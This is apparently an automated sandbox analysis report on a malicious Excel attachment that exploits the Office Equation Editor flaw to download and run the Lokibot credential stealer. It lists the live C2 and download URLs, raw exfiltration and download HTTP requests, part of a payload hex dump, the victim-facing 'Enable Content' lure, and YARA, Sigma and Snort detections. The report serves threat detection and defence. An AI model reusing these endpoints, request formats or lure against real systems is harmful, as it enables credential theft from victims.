Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report MV FORTUNE TRADER.xlsx

Overview

General Information

Sample Name:MV FORTUNE TRADER.xlsx
Analysis ID:353332
MD5:b9d2e20a706f5dccd80cbfca09685732
SHA1:b3d2b8eaa620398c83ff203c3c705d03dad55288
SHA256:132f5ce3c879259992351ae90865928ed508f5a76ab3f97ce6cd624ecccb551d
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 944 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2344 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1276 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2559B5B8D60DD663DF52D0570F5973A9)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://becharnise.ir/fa13/fre.php"]}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
          • 0x13e4f:$des3: 68 03 66 00 00
          • 0x18240:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
          • 0x1830c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
          00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          Click to see the 14 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.3.vbc.exe.240000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13278:$s1: http://
          • 0x16233:$s1: http://
          • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13280:$s2: https://
          • 0x13278:$f1: http://
          • 0x16233:$f1: http://
          • 0x13280:$f2: https://
          4.3.vbc.exe.240000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            4.3.vbc.exe.240000.0.unpackLoki_1Loki Payloadkevoreilly
            • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x133fc:$a2: last_compatible_version
            4.3.vbc.exe.240000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x123ff:$des3: 68 03 66 00 00
            • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            4.2.vbc.exe.220e50.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
            • 0x13278:$s1: http://
            • 0x16233:$s1: http://
            • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
            • 0x13280:$s2: https://
            • 0x13278:$f1: http://
            • 0x16233:$f1: http://
            • 0x13280:$f2: https://
            Click to see the 25 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2344, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1276
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.141.138.123, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2344, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2344, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe
            Sigma detected: Executables Started in Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2344, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1276
            Sigma detected: Execution in Non-Executable FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2344, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1276
            Sigma detected: Suspicious Program Location Process StartsShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2344, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1276

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://stdyrusschinetwomast.dns.army/receiprt/regasm.exeAvira URL Cloud: Label: malware
            Found malware configurationShow sources
            Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://becharnise.ir/fa13/fre.php"]}
            Multi AV Scanner detection for domain / URLShow sources
            Source: becharnise.irVirustotal: Detection: 16%Perma Link
            Source: http://kbfvzoboss.bid/alien/fre.phpVirustotal: Detection: 14%Perma Link
            Source: http://alphastand.win/alien/fre.phpVirustotal: Detection: 9%Perma Link
            Source: http://alphastand.trade/alien/fre.phpVirustotal: Detection: 10%Perma Link
            Source: http://stdyrusschinetwomast.dns.army/receiprt/regasm.exeVirustotal: Detection: 9%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exeReversingLabs: Detection: 36%
            Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 36%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exeJoe Sandbox ML: detected

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

            Compliance:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.400000.1.unpack
            Uses new MSVCR DllsShow sources
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Uses secure TLS version for HTTPS connectionsShow sources
            Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00403D74 FindFirstFileW,
            Source: global trafficDNS query: name: cutt.ly
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 185.208.180.121:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 185.208.180.121:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 185.208.180.121:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 185.208.180.121:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
            Source: Malware configuration extractorURLs: http://becharnise.ir/fa13/fre.php
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 16 Feb 2021 06:02:42 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Tue, 16 Feb 2021 01:44:33 GMTETag: "41c00-5bb6a3e863566"Accept-Ranges: bytesContent-Length: 269312Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e0 7b ab 66 a4 1a c5 35 a4 1a c5 35 a4 1a c5 35 ba 48 50 35 b6 1a c5 35 ba 48 41 35 99 1a c5 35 ba 48 46 35 d7 1a c5 35 83 dc be 35 a1 1a c5 35 a4 1a c4 35 d4 1a c5 35 ba 48 4f 35 a5 1a c5 35 ba 48 57 35 a5 1a c5 35 ba 48 51 35 a5 1a c5 35 ba 48 54 35 a5 1a c5 35 52 69 63 68 a4 1a c5 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e4 41 b2 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 02 00 00 b2 c6 04 00 00 00 00 40 30 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 c8 04 00 04 00 00 6d 30 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 86 03 00 62 00 00 00 60 7d 03 00 3c 00 00 00 00 10 c8 04 18 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 71 ee 02 00 00 10 00 00 00 f0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 86 00 00 00 00 03 00 00 88 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 74 c4 04 00 90 03 00 00 28 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 76 00 00 00 10 c8 04 00 78 00 00 00 a4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: Joe Sandbox ViewIP Address: 172.67.8.238 172.67.8.238
            Source: Joe Sandbox ViewIP Address: 103.141.138.123 103.141.138.123
            Source: Joe Sandbox ViewIP Address: 185.208.180.121 185.208.180.121
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
            Source: Joe Sandbox ViewASN Name: AMINIDCIR AMINIDCIR
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: global trafficHTTP traffic detected: GET /receiprt/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyrusschinetwomast.dns.army
            Source: global trafficHTTP traffic detected: POST /fa13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: becharnise.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4081BD40Content-Length: 176Connection: close
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00404ED4 recv,
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83553F27.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /receiprt/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyrusschinetwomast.dns.army
            Source: unknownDNS traffic detected: queries for: cutt.ly
            Source: unknownHTTP traffic detected: POST /fa13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: becharnise.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4081BD40Content-Length: 176Connection: close
            Source: vbc.exeString found in binary or memory: http://becharnise.ir/fa13/fre.php
            Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: 83553F27.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
            Source: vbc.exe, vbc.exe, 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
            Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
            Source: Screenshot number: 4Screenshot OCR: Enable Editing from the , , yellow bar above 21 This document is 22 ? protected 3 Once you have e
            Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 24 25 26 27 28 29 lh\ Auv i r g prL?'tya vu a og u43
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exeJump to dropped file
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0040549C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004029D4
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00222C24
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002256EC
            Source: MV FORTUNE TRADER.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Users\Public\vbc.exeCode function: String function: 0041219C appears 45 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00405B6F appears 42 times
            Source: C:\Users\Public\vbc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
            Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
            Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
            Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
            Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
            Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
            Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
